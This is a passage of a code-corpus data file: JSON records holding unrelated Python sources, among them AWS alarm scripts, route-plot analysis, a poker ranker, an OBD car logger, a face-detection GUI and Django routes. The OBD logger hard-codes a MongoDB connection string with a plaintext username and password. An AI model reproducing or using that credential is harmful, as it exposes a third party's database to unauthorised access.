AWSCredentialsManager\nfrom bluecanary.plugins import load_plugins\nfrom bluecanary.set_cloudwatch_alarm import set_cloudwatch_alarm\nfrom bluecanary.tags import get_all_elb_tags\nfrom bluecanary.utilities import preserve_credentials_state\n\n\nplugin_alarms = load_plugins()\n\n\n@preserve_credentials_state\ndef update_elb_alarms(verbose=0):\n alarm_keys = AlarmsManager.get_alarm_keys()\n\n for alarm_key in alarm_keys:\n alarm_group = AlarmsManager.get_alarm_group(alarm_key)\n\n tag_key = alarm_group.get('TagKey')\n tag_value = alarm_group.get('TagValue')\n\n AWSCredentialsManager.load_saved_environment_state()\n if alarm_group.get('AWSProfile'):\n AWSCredentialsManager.load_aws_profile(alarm_group['AWSProfile'])\n\n elb_tags = get_all_elb_tags(tag_key)\n\n for elb_name, key in elb_tags.items():\n if key != alarm_key:\n continue\n\n if verbose:\n click.echo('\\nUpdating load balancer {} tagged with {}: {}'\n .format(elb_name, tag_key, tag_value))\n\n alarms = alarm_group.get('Alarms', [])\n for alarm in alarms:\n if verbose:\n click.echo('Updating {} alarm on load balancer {}'\n .format(alarm['MetricName'], elb_name))\n\n if alarm['MetricName'] in plugin_alarms:\n alarm = plugin_alarms.get(alarm['MetricName']).get_updated_alarm_kwargs(\n identifier=elb_name,\n **alarm\n )\n\n set_cloudwatch_alarm(elb_name, **alarm)\n","sub_path":"bluecanary/scripts/update_alarms/update_elb_alarms.py","file_name":"update_elb_alarms.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"450631032","text":"\nimport mock\n\nimport helpers\n\nhelpers.path_bodge()\n\nfrom proton_helper import ProtonHelper\n\ndef assert_load(data_to_load):\n mock_loader = mock.Mock()\n mock_loader.return_value = data_to_load\n ph = ProtonHelper(mock_loader)\n\n input_ = 'bacon'\n ph.load(input_)\n\n mock_loader.assert_called_once_with(input_)\n\n return ph\n\ndef test_load():\n loaded_data = {\n \"match_number\": 1,\n \"teams\": {\n \"TLA1\": {\n \"zone\": 0,\n },\n \"TLA2\": {\n \"zone\": 2,\n },\n }\n }\n\n assert_load(loaded_data)\n\ndef test_team_scoresheets():\n teams_data_complete = {\n \"TLA1\": {\n \"zone\": 0,\n \"bacon\": 4,\n \"present\": True,\n \"disqualified\": False,\n },\n \"TLA2\": {\n \"zone\": 2,\n \"bacon\": 13,\n \"present\": False,\n \"disqualified\": True,\n },\n }\n loaded_data = {\n \"match_number\": 1,\n \"teams\": {\n \"TLA1\": {\n \"zone\": 0,\n \"bacon\": 4,\n # defaults\n },\n \"TLA2\": {\n \"zone\": 2,\n \"bacon\": 13,\n \"present\": False,\n \"disqualified\": True,\n },\n },\n }\n\n ph = assert_load(loaded_data)\n\n team_scoresheets = ph.team_scoresheets\n\n assert team_scoresheets == teams_data_complete\n\ndef test_produce():\n input_ = {\n \"match_number\": 1,\n \"teams\": {\n \"TLA1\": {\n \"zone\": 0,\n },\n \"TLA2\": {\n \"zone\": 2,\n \"present\": False,\n \"disqualified\": True,\n },\n }\n }\n\n mock_loader = mock.Mock()\n mock_loader.return_value = input_\n ph = ProtonHelper(mock_loader)\n ph.load(None)\n\n scores = { \"TLA1\": 0, \"TLA2\": 13 }\n\n whole = ph.produce(scores)\n\n assert whole[\"version\"] == \"1.0.0\"\n assert whole[\"match_number\"] == 1\n assert whole[\"scores\"] == {\n \"TLA1\": helpers.tla_result_fixture(0, 0),\n \"TLA2\": {\n \"score\": 13,\n \"zone\": 2,\n # while not sane these are expected to be pass-through\n \"present\": False,\n \"disqualified\": True,\n },\n }\n","sub_path":"test/proton_helper_test.py","file_name":"proton_helper_test.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"385278711","text":"import evaluation\nimport folium\nimport main\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport weather\nimport os\nimport pickle\n\nfrom matplotlib import cm, patches\nfrom matplotlib.collections import PatchCollection\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom pathlib import Path\n\n\ndef plot_stats(path_logs, name):\n for path_log in path_logs.values():\n for sub_path_log in path_log.values():\n _gen = sub_path_log.select(\"gen\")\n fit_mins = sub_path_log.chapters[\"fitness\"].select(\"min\")\n size_avgs = sub_path_log.chapters[\"size\"].select(\"avg\")\n\n fig, ax1 = plt.subplots()\n fig.suptitle(name)\n line1 = ax1.save_fronts(_gen, fit_mins, \"b-\", label=\"Minimum Fitness\")\n ax1.set_xlabel(\"Generation\")\n ax1.set_ylabel(\"Fitness\", color=\"b\")\n for tl in ax1.get_yticklabels():\n tl.set_color(\"b\")\n\n ax2 = ax1.twinx()\n line2 = ax2.save_fronts(_gen, size_avgs, \"r-\", label=\"Average Size\")\n ax2.set_ylabel(\"Size\", color=\"r\")\n for tl in ax2.get_yticklabels():\n tl.set_color(\"r\")\n\n lines = line1 + line2\n labs = [line.get_label() for line in lines]\n ax1.legend(lines, labs, loc=\"center right\")\n print('{} - final avg size'.format(name), size_avgs[-1])\n\n\nclass RoutePlotter:\n def __init__(self, bounds, n_plots, vessel=None, titles=None, ecas=None, show_colorbar=True, uin=None, vin=None,\n lons=None, lats=None, DIR=Path('D:/')):\n self.DIR = DIR\n self.col_map = cm.rainbow\n if titles:\n self.titles = titles\n else:\n self.titles = ['no_title'] * n_plots\n\n self.ecas = ecas\n self.show_colorbar = show_colorbar\n self.n_plots = n_plots\n\n if vessel:\n self.vessel = vessel\n else:\n self.vessel = evaluation.Vessel()\n\n if uin is not None:\n self.uin = uin\n self.vin = vin\n self.lons = lons\n self.lats = lats\n self.plot_currents = True\n else:\n self.uin = self.vin = self.lons = self.lats = None\n self.plot_currents = False\n\n # Set extent\n minx, miny, maxx, maxy = bounds\n margin = 2\n self.lef = max(minx - margin, -180)\n self.rig = min(maxx + margin, 180)\n self.bot = max(miny - margin, -90)\n self.top = min(maxy + margin, 90)\n\n self.rows = int(round(math.sqrt(n_plots)))\n self.columns = int(math.ceil(math.sqrt(n_plots)))\n\n def plot_routes(self, results_files, best_inds_files):\n fig = plt.figure()\n fig.suptitle('Routes', fontsize=12)\n\n r_iter = iter([r for ro in range(self.rows) for r in [ro] * self.columns])\n c_iter = iter(list(range(self.columns)) * self.rows)\n for i, result in enumerate(results_files):\n r, c = next(r_iter), next(c_iter)\n\n shortest_paths = result['initialRoutes']\n individuals = best_inds_files[i]\n\n ax = plt.subplot2grid((self.rows, self.columns), (r, c))\n ax.set_title(\"{}\".format(self.titles[i]), fontsize=10)\n m = Basemap(projection='merc', resolution='c', llcrnrlat=self.bot, urcrnrlat=self.top, llcrnrlon=self.lef,\n urcrnrlon=self.rig, ax=ax)\n m.drawparallels(np.arange(-90., 90., 10.), labels=[1, 0, 0, 0], fontsize=8)\n m.drawmeridians(np.arange(-180., 180., 10.), labels=[0, 0, 0, 1], fontsize=8)\n m.drawmapboundary(color='black', fill_color='aqua')\n m.fillcontinents(color='lightgray', lake_color='lightgray', zorder=2)\n m.readshapefile(self.DIR / 'data/bathymetry_200m/ne_10m_bathymetry_K_200', 'ne_10m_bathymetry_K_200',\n drawbounds=False)\n\n ps = [patches.Polygon(np.array(shape), True) for shape in m.ne_10m_bathymetry_K_200]\n ax.add_collection(PatchCollection(ps, facecolor='white', zorder=2))\n\n # Plot initial routes\n for p in shortest_paths.values():\n for sp in p['path'].values():\n for shortest_path in sp.values():\n waypoints = [item[0] for item in shortest_path]\n edges = zip(waypoints[:-1], waypoints[1:])\n for e in edges:\n m.drawgreatcircle(e[0][0], e[0][1], e[1][0], e[1][1], linewidth=2, color='black', zorder=3)\n\n # Plot individuals\n for p in individuals.values():\n for sp in p.values():\n for ind in sp:\n # Create colors\n true_speeds = [item[1] for item in ind[:-1]]\n normalized_speeds = [(speed - min(self.vessel.speeds)) / (\n max(self.vessel.speeds) - min(self.vessel.speeds)) for speed in true_speeds] + [0]\n\n # Plot edges\n waypoints = [item[0] for item in ind]\n edges = zip(waypoints[:-1], waypoints[1:])\n for j, e in enumerate(edges):\n m.drawgreatcircle(e[0][0], e[0][1], e[1][0], e[1][1], linewidth=2,\n color=self.col_map(normalized_speeds[j]), zorder=3)\n for j, (x, y) in enumerate(waypoints):\n m.scatter(x, y, latlon=True, color='dimgray', marker='o', s=5, zorder=4)\n\n if self.plot_currents:\n # Transform vector and coordinate data\n vec_lon = int(self.uin.shape[1] / (2 * 360 / (self.rig - self.lef)))\n vec_lat = int(self.uin.shape[0] / (2 * 180 / (self.top - self.bot)))\n u_rot, v_rot, x, y = m.transform_vector(self.uin, self.vin, self.lons, self.lats, vec_lon, vec_lat,\n returnxy=True)\n\n vec_plot = m.quiver(x, y, u_rot, v_rot, color='gray', scale=50, width=.002)\n plt.quiverkey(vec_plot, 0.2, -0.2, 1, '1 knot', labelpos='W') # Position and reference label\n\n if self.ecas:\n for eca in self.ecas:\n lon, lat = eca.exterior.xy\n x, y = m(lon, lat)\n m.plot(x, y, 'o-', markersize=2, linewidth=1)\n\n if self.show_colorbar:\n # Create color bar\n sm = plt.cm.ScalarMappable(cmap=self.col_map)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n col_bar = plt.colorbar(sm,\n norm=plt.Normalize(vmin=min(self.vessel.speeds), vmax=max(self.vessel.speeds)),\n cax=cax)\n min_s, max_s = min(self.vessel.speeds), max(self.vessel.speeds)\n # noinspection PyProtectedMember\n col_bar._ax.set_yticklabels(\n ['%.1f' % round(min_s, 1), '%.1f' % round((1 / 5) * (max_s - min_s) + min_s, 1),\n '%.1f' % round((2 / 5) * (max_s - min_s) + min_s, 1),\n '%.1f' % round((3 / 5) * (max_s - min_s) + min_s, 1),\n '%.1f' % round((4 / 5) * (max_s - min_s) + min_s, 1), '%.1f' % round(max_s, 1)], fontsize=8)\n col_bar.set_label('Calm water speed [kn]', rotation=270, labelpad=15, fontsize=10)\n\n\ndef plot_fronts(front):\n # Plot fronts\n front = np.array([_ind.fitness.values for _ind in front])\n\n ax = plt.subplot2grid((max_sp, n_p), (sp_key, _p))\n ax.scatter(front[:, 0], front[:, 1], c=\"b\", s=1)\n ax.set_title('P{} - SP{}'.format(_p, sp_key))\n ax.axis(\"tight\")\n ax.grid()\n ax.set_xlabel('Travel time [d]')\n ax.set_ylabel(r'Fuel cost [USD, $\\times 1000$]')\n\n\ndef plot_interactive_route(path, path_key, obj_key):\n wps = [el[0] for el in path]\n start_point, end_point = wps[0], wps[-1]\n\n # Plot of the path using folium\n geo_path = np.asarray(wps)\n geo_path[:, [0, 1]] = geo_path[:, [1, 0]] # swap columns\n geo_map = folium.Map([0, 0], zoom_start=2)\n for point in geo_path:\n folium.Marker(point, popup=str(point)).add_to(geo_map)\n folium.PolyLine(geo_path).add_to(geo_map)\n\n # Add a Mark on the start and positions in a different color\n folium.Marker(geo_path[0], popup=str(start_point), icon=folium.Icon(color='red')).add_to(geo_map)\n folium.Marker(geo_path[-1], popup=str(end_point), icon=folium.Icon(color='red')).add_to(geo_map)\n\n # Save the interactive plot as a map\n output_name = 'output/example_path_{}_obj_{}_plot.html'.format(path_key, obj_key)\n geo_map.save(output_name)\n print('Output saved to: {}'.format(output_name))\n\n\nif __name__ == \"__main__\":\n os.chdir('..')\n _ID_dict = {'Cruisje naar Sydney': '22_09_26'}\n\n # _start_date = datetime.datetime(2016, 1, 1)\n _start_date = None\n planner = main.RoutePlanner()\n\n DIR = Path('D:/')\n\n with open(DIR / 'data/seca_areas_csv', 'rb') as file:\n _ecas = pickle.load(file)\n\n # Get outer bounds of all paths\n _minx, _miny, _maxx, _maxy = 180, 90, -180, -90\n for file_id in _ID_dict.values():\n with open('output/result/{}'.format(file_id), 'rb') as f:\n _result = pickle.load(f)\n\n for _p in _result['fronts'].values():\n for _front in _p.values():\n # Get outer bounds of paths\n _wps = np.asarray([row[0] for ind in _front for row in ind])\n minx_i, miny_i = np.amin(_wps, axis=0)\n maxx_i, maxy_i = np.amax(_wps, axis=0)\n _minx, _miny = min(minx_i, _minx), min(miny_i, _miny)\n _maxx, _maxy = max(maxx_i, _maxx), max(maxy_i, _maxy)\n\n _bounds = (_minx, _miny, _maxx, _maxy)\n\n plotter = RoutePlotter(bounds=_bounds, n_plots=len(_ID_dict), titles=list(_ID_dict.keys()), ecas=_ecas,\n vessel=planner.vessel)\n\n all_results, all_best_inds = [], []\n # Inspect best individuals for every ID dict key\n for f_idx, f_title in enumerate(_ID_dict.keys()):\n with open('output/result/{}'.format(_ID_dict[f_title]), 'rb') as f:\n _result = pickle.load(f)\n\n # Initialize pareto_fig\n pareto_fig, axs = plt.subplots(squeeze=False)\n pareto_fig.suptitle(f_title)\n\n n_p = len(_result['fronts'])\n max_sp = max([len(_result['fronts'][p]) for p in _result['fronts']])\n\n # Get best individuals in front\n best_inds = {}\n max_days = 0\n for _p, p_val in _result['fronts'].items():\n best_inds[_p] = {'fuel': [], 'time': [], 'fit': []}\n for sp_key, _front in p_val.items():\n # Get min time, min fuel and min fitness individuals\n fit_values = np.asarray([_ind.fitness.values for _ind in _front])\n\n time_ind = _front[np.argmin(fit_values[:, 0])]\n fuel_ind = _front[np.argmin(fit_values[:, 1])]\n fit_ind = _front[0]\n\n best_inds[_p]['fuel'].append(fuel_ind)\n best_inds[_p]['time'].append(time_ind)\n best_inds[_p]['fit'].append(fit_ind)\n\n # Get max days\n max_days = math.ceil(max(max_days, max(\n [fuel_ind.fitness.values[0], time_ind.fitness.values[0], fit_ind.fitness.values[0]])))\n\n # Plot fronts\n plot_fronts(_front)\n\n print('n_days:', max_days)\n\n if _start_date:\n planner.evaluator.currentOp = weather.CurrentOperator(_start_date, max_days)\n\n for _p, _path in best_inds.items():\n for _k, _ind_list in _path.items():\n total_fit = total_original_fit = np.zeros(2)\n for _ind in _ind_list:\n plot_interactive_route(_ind, _p, _k)\n fit = np.array(planner.tb.evaluate(_ind))\n original_fit = np.array(_ind.fitness.values)\n total_fit += fit\n total_original_fit += original_fit\n\n file_key = list(_ID_dict.keys())[f_idx]\n print('File {} Path {} Obj {:>4} real'.format(file_key, _p, _k), np.round(total_fit,\n 2)) # print('File {} Path\n # {} Obj {:>4} orig'.format(file_key, _p, _k), np.round(total_original_fit, 2)) # print('DIFF\n # ORIGINAL: {}'.format(np.subtract(_ind.fitness.values, fit)))\n\n all_results.append(_result)\n all_best_inds.append(best_inds)\n\n plotter.plot_routes(all_results, all_best_inds)\n\n for f_idx, f_title in enumerate(_ID_dict.keys()):\n with open('output/result/{}'.format(_ID_dict[f_title]), 'rb') as f:\n _result = pickle.load(f)\n\n plot_stats(_result['logs'], f_title)\n plt.show()\n","sub_path":"analysis/inspection.py","file_name":"inspection.py","file_ext":"py","file_size_in_byte":13058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"198549248","text":"\"\"\"\r\n\n\nIn this challenge, you have to establish which kind of Poker combination is\npresent in a deck of five cards. Every card is a string containing the card\nvalue (with the upper-case initial for face-cards) and the lower-case initial\nfor suits, as in the examples below:\n\n \"Ah\" ➞ Ace of hearts\n \"Ks\" ➞ King of spades\n \"3d\" ➞ Three of diamonds\n \"Qc\" ➞ Queen of clubs\n\nThere are 10 different combinations. Here's the list, in decreasing order of\nimportance:\n\nName| Description \n---|--- \n **Royal Flush**| A, K, Q, J, 10, all with the same suit. \n **Straight Flush**| Five cards in sequence, all with the same suit. \n **Four of a Kind**| Four cards of the same rank. \n **Full House**| Three of a Kind with a Pair. \n **Flush**| Any five cards of the same suit, not in sequence. \n **Straight**| Five cards in a sequence, but not of the same suit. \n **Three of a Kind**| Three cards of the same rank. \n **Two Pair**| Two different Pair. \n **Pair**| Two cards of the same rank. \n **High Card**| No other valid combination. \n \nGiven a list `hand` containing five strings being the cards, implement a\nfunction that returns a string with the name of the highest combination\nobtained, accordingly to the table above.\n\n### Examples\n\n poker_hand_ranking([\"10h\", \"Jh\", \"Qh\", \"Ah\", \"Kh\"]) ➞ \"Royal Flush\"\n \n poker_hand_ranking([\"3h\", \"5h\", \"Qs\", \"9h\", \"Ad\"]) ➞ \"High Card\"\n \n poker_hand_ranking([\"10s\", \"10c\", \"8d\", \"10d\", \"10h\"]) ➞ \"Four of a Kind\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef poker_hand_ranking(hand):\n lookup = {\"2\":2, \"3\":3, \"4\":4, \"5\":5, \"6\":6, \"7\":7, \"8\":8, \"9\":9, \"1\":10, \"J\":11, \"Q\":12, \"K\":13, \"A\":14}\n values = []\n suits = []\n for x in range(len(hand)):\n values.append(lookup.get(hand[x][0]))\n suits.append(hand[x][len(hand[x]) - 1])\n values.sort()\n \n #royal/straight/flush\n if suits.count(suits[0]) == len(suits):\n if values == list(range(min(values), max(values) + 1)):\n if values == list(range(10, 15)):\n return \"Royal Flush\"\n return \"Straight Flush\"\n return \"Flush\"\n \n #four of a kind\n if values.count(values[0]) == 4 or values.count(values[1]) == 4:\n return \"Four of a Kind\"\n \n #full house/three of a kind\n if values.count(values[1]) == 3:\n if values.count(values[len(values) - 1]) == 2:\n return \"Full House\"\n return \"Three of a Kind\"\n if values.count(values[len(values) - 1]) == 3:\n if values.count(values[1]) == 2:\n return \"Full House\"\n return \"Three of a Kind\"\n \n #straight\n if values == list(range(min(values), max(values) + 1)):\n return \"Straight\"\n \n #two pair\n if values.count(values[1]) == 2:\n if values.count(values[3]) == 2:\n return \"Two Pair\"\n return \"Pair\"\n if values.count(values[3]) == 2:\n if values.count(values[1]) == 2:\n return \"Two Pair\"\n return \"Pair\"\n \n return \"High Card\"\n\n","sub_path":"C6pHyc4iN6BNzmhsM_22.py","file_name":"C6pHyc4iN6BNzmhsM_22.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"614451082","text":"import RPi.GPIO as GPIO\nimport obd\nfrom obd import OBDStatus\nimport datetime\n\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(18,GPIO.OUT)\n\nwhile (OBDStatus.CAR_CONNECTED):\n # successful communication with the ELM327 and the vehicle\n\n connection = obd.OBD() # auto-connects to USB or RF port\n \n spd = obd.commands.SPEED\n rpm = obd.commands.RPM # select an OBD command (sensor)\n tps = obd.commands.THROTTLE_POS\n maf = obd.commands.MAF\n engload = obd.commands.ENGINE_LOAD \n \n speed = connection.query(spd)\n revolution = connection.query(rpm) # send the command, and parse the response\n throttle_pos = connection.query(tps)\n massflow = connection.query(maf)\n engine_load = connection.query(engload)\n\n print(speed.value)\n print(revolution.value.magnitude) # returns unit-bearing values thanks to Pint\n print(throttle_pos.value)\n print(massflow.value)\n print(engine_load.value)\n \n if speed.value.magnitude <= 1:\n GPIO.output(18,GPIO.HIGH)\n elif speed.value.magnitude >= 2:\n GPIO.output(18,GPIO.LOW)\n else:\n GPIO.output(18,GPIO.LOW)\n\n from pymongo import MongoClient\n # pprint library is used to make the output look more pretty\n from pprint import pprint\n # connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string\n\n client = MongoClient('mongodb://gareth:1utmHy2HBYCKZWLO@testing-shard-00-00-ic2uk.mongodb.net:27017,testing-shard-00-01-ic2uk.mongodb.net:27017,testing-shard-00-02-ic2uk.mongodb.net:27017/test?ssl=true&replicaSet=testing-shard-0&authSource=admin')\n\n db=client.testdb\n\n from datetime import datetime\n\n result = db.smartcar.insert_one(\n {\n \"Vehicle\": {\n \"Model\": \"Smart\",\n \"Year\": \"2005\",\n \"Type\": \"Roadster\",\n \"Speed\": speed.value.magnitude,\n \"RPM\": revolution.value.magnitude,\n \"TPS\": throttle_pos.value.magnitude,\n \"MAF\": massflow.value.magnitude,\n \"EngineLoad\": engine_load.value.magnitude\n }\n }\n )\n","sub_path":"dev_python/obdmong.py","file_name":"obdmong.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"601586024","text":"# -*- coding: utf-8 -*-\n\nimport os, sys\nimport numpy as np\nfrom scipy import misc\nimport matplotlib.pyplot as plt\n\n\ndef plot_lr(l_img, r_img, l_title=None, r_title=None, suptitle=None):\n\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(10, 4))\n\n axes[0].imshow(l_img)\n axes[0].set_title(l_title)\n\n axes[1].imshow(r_img)\n axes[1].set_title(r_title)\n\n plt.suptitle(suptitle, fontsize=16)\n plt.show()\n\nif __name__ == '__main__':\n img1 = misc.imread('/home/pingjun/Desktop/SegPreds/n0253.png')\n img2 = misc.imread('/home/pingjun/Desktop/SegPreds/n0265.png')\n plot_lr(img1, img2, l_title=\"Left\", r_title=\"Right\", suptitle=\"Two Images\")\n","sub_path":"pydaily/plots/subplot.py","file_name":"subplot.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"199721238","text":"from PyQt5.QtWidgets import QPushButton, QVBoxLayout, QWidget, QApplication\nfrom PyQt5.QtGui import QIcon, QPixmap\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport ChineseText\nimport sys\nfrom time import sleep\nimport os\n\n\nclass WindowClass(QWidget):\n def __init__(self, parent=None):\n super(WindowClass, self).__init__(parent)\n self.cap = cv2.VideoCapture(0)\n self.ret = None\n self.img = None\n self.number = 1\n self.classifier = cv2.CascadeClassifier(\n \"D:\\Files\\PythonFile\\pyQt5Demo\\data\\haarcascades\\haarcascade_frontalface_default.xml\")\n\n self.btn_1 = QPushButton(\"开始\")\n self.btn_3 = QPushButton(\"捕捉\")\n self.btn_4 = QPushButton(\"退出\")\n self.btn_2=QPushButton(\"特效\")\n\n # self.btn_1.setCheckable(True) # 设置已经被点击\n # self.btn_1.toggle() # 切换按钮状态\n self.btn_1.clicked.connect(lambda: self.wichBtn(self.btn_1))\n\n # self.btn_2.setDefault(True)\n self.btn_2.clicked.connect(lambda: self.wichBtn(self.btn_2))\n\n # self.btn_3.setDefault(True) # 设置该按钮式默认状态的\n self.btn_3.clicked.connect(lambda: self.wichBtn(self.btn_3))\n\n self.btn_4.clicked.connect(lambda: self.wichBtn(self.btn_4))\n\n self.resize(400, 300)\n layout = QVBoxLayout()\n layout.addWidget(self.btn_1)\n layout.addWidget(self.btn_2)\n layout.addWidget(self.btn_3)\n layout.addWidget(self.btn_4)\n # layout.addWidget(self.btn_2)\n\n self.setLayout(layout)\n\n def btnState(self):\n\n # OpenCV人脸识别分类器\n # cap=cv2.VideoCapture(0)\n while(1):\n self.ret, self.img = self.cap.read()\n gray = cv2.cvtColor(self.img, cv2.COLOR_RGB2GRAY)\n gender_classifier = load_model(\n \"D:\\Files\\PythonFile\\pyQt5Demo\\\\faceai-master\\\\faceai\\classifier\\gender_models\\simple_CNN.81-0.96.hdf5\")\n gender_labels = {0: '女', 1: '男'}\n # classifier = cv2.CascadeClassifier(\n # \"D:\\\\Files\\PythonFile\\\\pyQt5Demo\\\\data\\haarcascades\\\\haarcascade_frontalface_default.xml\"\n # )\n color = (0, 100, 0) # 定义绘制颜色\n # 调用识别人脸\n faceRects = self.classifier.detectMultiScale(\n gray, scaleFactor=1.2, minNeighbors=3, minSize=(32, 32))\n if len(faceRects): # 大于0则检测到人脸\n for faceRect in faceRects: # 单独框出每一张人脸\n x, y, w, h = faceRect\n face = self.img[(y - 60):(y + h + 60), (x - 30):(x + w + 30)]\n face = cv2.resize(face, (48, 48))\n face = np.expand_dims(face, 0)\n face = face / 255.0 \n gender_label_arg = np.argmax(gender_classifier.predict(face))\n gender = gender_labels[gender_label_arg]\n cv2.rectangle(self.img, (x, y), (x + h, y + w), color, 2)\n self.img = ChineseText.cv2ImgAddText(self.img, gender, x + h, y, color, 30)\n # 框出人脸\n cv2.rectangle(self.img, (x, y), (x + h, y + w), color, 1)\n # 左眼\n cv2.circle(self.img, (x + w // 4, y + h // 4 + 30), min(w // 8, h // 8),\n color, 1)\n # 右眼\n cv2.circle(self.img, (x + 3 * w // 4, y + h // 4 + 30), min(w // 8, h // 8),\n color, 1)\n # 嘴巴\n cv2.rectangle(self.img, (x + 3 * w // 8, y + 3 * h // 4),\n (x + 5 * w // 8, y + 7 * h // 8), color, 1)\n\n cv2.namedWindow(\"enhanced\", flags=0)\n cv2.resizeWindow(\"enhanced\", 1000, 960)\n cv2.imshow(\"enhanced\", self.img) # 显示图像\n c = cv2.waitKey(10)\n def btnState2(self):\n while(1):\n imgCompose = cv2.imread(\"D:\\Files\\PythonFile\\\\figures\\maozi.png\")\n # cap = cv2.VideoCapture(0)\n ret,img=self.cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 转换灰色\n color = (0, 255, 0) # 定义绘制颜色\n # 调用识别人脸\n faceRects = self.classifier.detectMultiScale(\n gray, scaleFactor=1.2, minNeighbors=3, minSize=(32, 32))\n if len(faceRects): # 大于0则检测到人脸\n for faceRect in faceRects: \n x, y, w, h = faceRect\n sp = imgCompose.shape\n imgComposeSizeH = int(sp[0]/sp[1]*w)\n if imgComposeSizeH>(y-20):\n imgComposeSizeH=(y-20)\n imgComposeSize = cv2.resize(imgCompose,(w, imgComposeSizeH), interpolation=cv2.INTER_NEAREST)\n top = (y-imgComposeSizeH-20)\n if top<=0:\n top=0\n rows, cols, channels = imgComposeSize.shape\n roi = img[top:top+rows,x:x+cols]\n\n # Now create a mask of logo and create its inverse mask also\n img2gray = cv2.cvtColor(imgComposeSize, cv2.COLOR_RGB2GRAY)\n ret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY) \n mask_inv = cv2.bitwise_not(mask)\n\n # Now black-out the area of logo in ROI\n img1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\n\n # Take only region of logo from logo image.\n img2_fg = cv2.bitwise_and(imgComposeSize, imgComposeSize, mask=mask)\n\n # Put logo in ROI and modify the main image\n dst = cv2.add(img1_bg, img2_fg)\n img[top:top+rows, x:x+cols] = dst\n cv2.namedWindow(\"enhanced\", flags=0)\n cv2.resizeWindow(\"enhanced\", 1000, 960)\n cv2.imshow(\"enhanced\", img) # 显示图像\n c = cv2.waitKey(10)\n def wichBtn(self, btn):\n if btn == self.btn_1:\n self.btnState()\n elif btn == self.btn_4:\n self.cap.release()\n self.close()\n elif btn==self.btn_2:\n self.btnState2()\n else:\n imgpath = \"D:\\Files\\PythonFile\\\\figures\" \"\\\\\" + \\\n str(self.number) + \".jpg\"\n cv2.imwrite(imgpath, self.img)\n self.number = self.number+1\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = WindowClass()\n win.show()\n sys.exit(app.exec_())\n","sub_path":"pyQt5Demo/pyQtDemo.py","file_name":"pyQtDemo.py","file_ext":"py","file_size_in_byte":6620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"77501810","text":"\n\nfrom xai.brain.wordbase.nouns._varnish import _VARNISH\n\n#calss header\nclass _VARNISHES(_VARNISH, ):\n\tdef __init__(self,): \n\t\t_VARNISH.__init__(self)\n\t\tself.name = \"VARNISHES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"varnish\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_varnishes.py","file_name":"_varnishes.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274121649","text":"from io import BytesIO\r\n\r\nfrom aiohttp.web import Response as send_file\r\nfrom wand import image\r\n\r\nfrom utils import http\r\nfrom utils.endpoint import Endpoint\r\n\r\n\r\nclass Magik(Endpoint):\r\n async def generate(self, request, avatars, text, usernames):\r\n avatar = await http.get_image(request, avatars[0])\r\n with image.Image(file=avatar) as img:\r\n img.transform(resize='400x400')\r\n img.liquid_rescale(width=int(img.width * 0.5),\r\n height=int(img.height * 0.5),\r\n delta_x=0.5,\r\n rigidity=0)\r\n img.liquid_rescale(width=int(img.width * 1.5),\r\n height=int(img.height * 1.5),\r\n delta_x=2,\r\n rigidity=0)\r\n\r\n b = BytesIO()\r\n img.save(file=b)\r\n b.seek(0)\r\n return send_file(body=b, content_type='image/png')\r\n\r\n\r\ndef setup():\r\n return Magik()\r\n","sub_path":"endpoints/magik.py","file_name":"magik.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"61996331","text":"from django.urls import path\n\nfrom .views import index, room, chatroomlist, createroom, current_user, UserList, AddRoom, RemoveRoom\n\nurlpatterns = [\n path('', index, name='index'),\n path('current_user/', current_user),\n path('users/', UserList.as_view()),\n path('/', room, name='room'),\n path('chatroomlist//', chatroomlist, name='chatroomlist'),\n path('removeroom//', RemoveRoom, name=\"removeroom\"),\n path('createroom//', AddRoom, name='addroom')\n]\n","sub_path":"capstone/chat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"537719481","text":"# 51. N-Queens # The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.\n\n# Given an integer n, return all distinct solutions to the n-queens puzzle.\n\n# Each solution contains a distinct board configuration of the n-queens' placement,\n# where 'Q' and '.' both indicate a queen and an empty space respectively.\n\n# Example:\n\n# Input: 4\n# Output: [\n# [\".Q..\", // Solution 1\n# \"...Q\",\n# \"Q...\",\n# \"..Q.\"],\n\n# [\"..Q.\", // Solution 2\n# 